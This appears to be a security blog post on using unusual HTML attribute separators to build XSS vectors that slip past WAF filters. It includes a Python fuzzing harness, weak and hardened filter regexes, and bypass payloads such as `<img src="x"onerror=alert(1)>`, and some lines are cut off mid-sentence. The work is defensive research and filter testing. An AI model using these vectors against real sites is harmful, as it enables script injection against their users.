Using HTML Attribute Separators for Bypassing WAF XSS Filters
This is an experiment I did recently to identify the characters that browsers accept as HTML attribute separators and to use them in constructing XSS vectors. Vectors built from these characters parse correctly in modern browsers, which makes them useful for bypassing XSS filters, including those of WAFs.
An example of a common XSS vector is:
<img src=x onerror=alert(1)>
We will be using this vector as a baseline for the demonstration in this experiment.
An image is requested at
A typical XSS regular expression that blocks this vector looks for the whitespace between the tag name and its attributes. The same vector bypasses such a rule when the slash (“/”) character is used as the attribute separator instead of a space (a well-known payload). Note that the slash only works where an attribute name follows it; placed directly after an unquoted attribute value it becomes part of that value, so quote the value or keep a whitespace separator there:
Fuzzing for Valid Attributes Separators in Modern Browsers
Horizontal Tab (
These are in addition to the previously known separators, space (0x20) and slash (0x2F).
Notes on Bypassing WAFs Using Identified Attributes Separators
In general, WAF rule sets are strict about blocking certain inputs. By using unusual attribute separators it is possible to bypass weakly written rules. This is an aid in constructing a valid XSS vector; I do not expect a vanilla
<img(attribute-separator)src=x(attribute-separator)onerror=alert(1)> to be a payload that bypasses a WAF rule set on its own. Instead, tweaking the payload around these separators increases the chances of writing a valid vector that bypasses the WAF's XSS filters.
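As an added example (not code from the original post), the harness below automates the fuzzing described in the previous section and then reuses its output for the WAF-side check made in the notes above. It substitutes every byte 0x00 to 0xFF into the separator slots of the post's template, tokenizes each candidate with a small start-tag tokenizer written here to follow the HTML Standard's tag-name and attribute states (a stand-in for loading the payloads in a browser), and reports which bytes still yield an <img> carrying both src and onerror. It then runs two constructed filter rules over the surviving payloads: WEAK_RULE, which only knows the space separator, and HARD_RULE, which accepts every separator a browser does. The rules, the templates and the helper names are mine, not CRS rules or the post's own payloads.

```python
"""Fuzz every byte as an HTML attribute separator against a tokenizer that follows
the HTML Standard's start-tag states, then measure two constructed WAF rules."""
import re

WS = "\t\n\x0c "  # tab, LF, FF, space; CR becomes LF in input preprocessing

def _finish(name, attrs):
    tag = {}
    for k, v in attrs:
        tag.setdefault(k, v)  # a repeated attribute name is dropped, as in browsers
    return name, tag

def tokenize_start_tag(markup):
    """Return (tag_name, {attr: value}) for a start tag tokenized the way a
    spec-conformant browser does, or None if `markup` is not a complete tag."""
    s = markup.replace("\r\n", "\n").replace("\r", "\n")
    if len(s) < 2 or s[0] != "<" or not ("a" <= s[1].lower() <= "z"):
        return None
    name, attrs, state, i = "", [], "tag name", 1
    while i < len(s):
        c = s[i]
        i += 1
        if state == "tag name":
            if c in WS: state = "before name"
            elif c == "/": state = "self-closing"
            elif c == ">": return _finish(name, attrs)
            else: name += "\ufffd" if c == "\0" else c.lower()
        elif state == "before name":
            if c in WS: pass
            elif c in "/>": i -= 1; state = "after name"
            elif c == "=": attrs.append(["=", ""]); state = "name"
            else: attrs.append(["", ""]); i -= 1; state = "name"
        elif state == "name":
            if c in WS or c in "/>": i -= 1; state = "after name"
            elif c == "=": state = "before value"
            else: attrs[-1][0] += "\ufffd" if c == "\0" else c.lower()
        elif state == "after name":
            if c in WS: pass
            elif c == "/": state = "self-closing"
            elif c == "=": state = "before value"
            elif c == ">": return _finish(name, attrs)
            else: attrs.append(["", ""]); i -= 1; state = "name"
        elif state == "before value":
            if c in WS: pass
            elif c in "\"'": state = "quoted " + c
            elif c == ">": return _finish(name, attrs)
            else: i -= 1; state = "unquoted"
        elif state.startswith("quoted"):
            if c == state[-1]: state = "after quoted"
            else: attrs[-1][1] += "\ufffd" if c == "\0" else c  # char refs not expanded
        elif state == "unquoted":
            if c in WS: state = "before name"
            elif c == ">": return _finish(name, attrs)
            else: attrs[-1][1] += "\ufffd" if c == "\0" else c  # a "/" stays in the value
        elif state == "after quoted":
            if c in WS: state = "before name"
            elif c == "/": state = "self-closing"
            elif c == ">": return _finish(name, attrs)
            else: i -= 1; state = "before name"  # parse error, but a new attribute starts
        elif state == "self-closing":
            if c == ">": return _finish(name, attrs)
            else: i -= 1; state = "before name"  # "/" not followed by ">" is just skipped
    return None  # end of input inside the tag: no token is emitted

def fuzz_separators(template, wanted=("src", "onerror")):
    """Substitute each byte 0x00..0xFF for every {sep} in `template` and return
    the bytes that still yield an <img> carrying all `wanted` attributes."""
    hits = []
    for b in range(256):
        tag = tokenize_start_tag(template.replace("{sep}", chr(b)))
        if tag and tag[0] == "img" and all(a in tag[1] for a in wanted):
            hits.append(b)
    return hits

# Constructed rules for illustration only (not CRS rules): WEAK_RULE knows only
# the space separator, HARD_RULE accepts every separator a browser accepts.
SEP = r"[\t\n\x0c\r /]"
WEAK_RULE = re.compile(r"<img [^>]*\bonerror=", re.I)
HARD_RULE = re.compile(r"<img" + SEP + r"[^>]*" + SEP + r"onerror" + SEP + r"*=", re.I)

def real_bypasses(rule, template):
    """Separator bytes that both survive the tokenizer and slip past `rule`."""
    return [b for b in fuzz_separators(template)
            if not rule.search(template.replace("{sep}", chr(b)))]

if __name__ == "__main__":
    for t in ("<img{sep}src=x onerror=alert(1)>",       # slot after the tag name
              "<img src=x{sep}onerror=alert(1)>",       # slot after an unquoted value
              "<img{sep}src=x{sep}onerror=alert(1)>"):  # the post's template
        print(t, [hex(b) for b in fuzz_separators(t)])
    quoted = '<img{sep}src="x"{sep}onerror=alert(1)>'
    print("weak rule bypassed by", [hex(b) for b in real_bypasses(WEAK_RULE, quoted)])
    print("hardened rule bypassed by", real_bypasses(HARD_RULE, quoted))
    print("no separator at all:", tokenize_start_tag('<img src="x"onerror=alert(1)>'))
```

For the slot after the tag name the harness reports 0x09, 0x0a, 0x0c, 0x0d, 0x20 and 0x2f; the slash drops out when the slot follows an unquoted value, because the tokenizer keeps a slash inside an unquoted attribute value, and quoting the value brings it back. The space-only rule is bypassed by every other separator, while the hardened rule stops all 256 single-byte substitutions. The last line shows the limit of any separator class: an attribute name may follow a closing quote directly, so `<img src="x"onerror=alert(1)>` has no separator at all and slips past the hardened rule too.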
Furthermore, I have previously demonstrated a number of payloads that implicitly use attribute separators to bypass the XSS filters of popular WAFs. You can read about my previous research at Link.
The techniques were tested against the ModSecurity Core Rule Set (CRS). The default installation blocks almost all variants; raising the Paranoia Level to 2 blocks the remaining payloads. I would like to thank Dr. Christian Folini for testing them against the CRS.
What to Do?
These characters can be used to craft better payloads for fuzzing WAF XSS filters. Feel free to use them on your next WAF assessment.
Consider every HTML attribute separator when writing filters; a rule that only recognises the space character can be bypassed with any of the others.